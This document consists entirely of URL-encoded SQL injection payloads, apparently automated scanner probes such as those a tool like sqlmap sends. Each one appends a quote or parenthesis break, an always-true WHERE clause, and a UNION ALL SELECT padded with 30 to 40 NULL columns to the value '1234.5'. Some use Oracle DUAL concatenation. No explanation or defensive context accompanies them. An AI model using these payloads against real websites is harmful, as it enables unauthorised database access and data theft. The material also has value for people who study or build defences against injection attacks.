1234.5%27%29%20WHERE%206807%3D6807%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%202524%3D2524%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%204975%3D4975%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%208049%3D8049%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%201006%3D1006%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%209504%3D9504%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%201764%3D1764%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202505%3D2505%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%206476%3D6476%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%209303%3D9303%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%205107%3D5107%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%203526%3D3526%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202380%3D2380%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%201384%3D1384%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%209231%3D9231%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203250%3D3250%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203565%3D3565%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%202540%3D2540%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%209825%3D9825%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%206464%3D6464%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%207342%3D7342%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203722%3D3722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%202306%3D2306%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%202147%3D2147%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203369%3D3369%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206567%3D6567%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206351%3D6351%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%205355%3D5355%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%205885%3D5885%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%208579%3D8579%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%209523%3D9523%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%202945%3D2945%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%204414%3D4414%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206814%3D6814%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%204166%3D4166%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209941%3D9941%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209291%3D9291%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%206928%3D6928%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%203186%3D3186%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%205974%3D5974%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%203663%3D3663%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%205395%3D5395%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%208077%3D8077%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202170%3D2170%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208635%3D8635%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206573%3D6573%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206335%3D6335%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208456%3D8456%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208046%3D8046%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208790%3D8790%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%202078%3D2078%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%204087%3D4087%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%202646%3D2646%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208486%3D8486%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27HsfT%27%20FROM%20DUAL%20WHERE%201531%3D1531%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27RBrc%27%20FROM%20DUAL%20WHERE%207071%3D7071%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27gDOV%27%20FROM%20DUAL%20WHERE%208944%3D8944%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27sYgQ%27%20FROM%20DUAL%20WHERE%209869%3D9869%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ncbh%27%20FROM%20DUAL%20WHERE%202607%3D2607%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 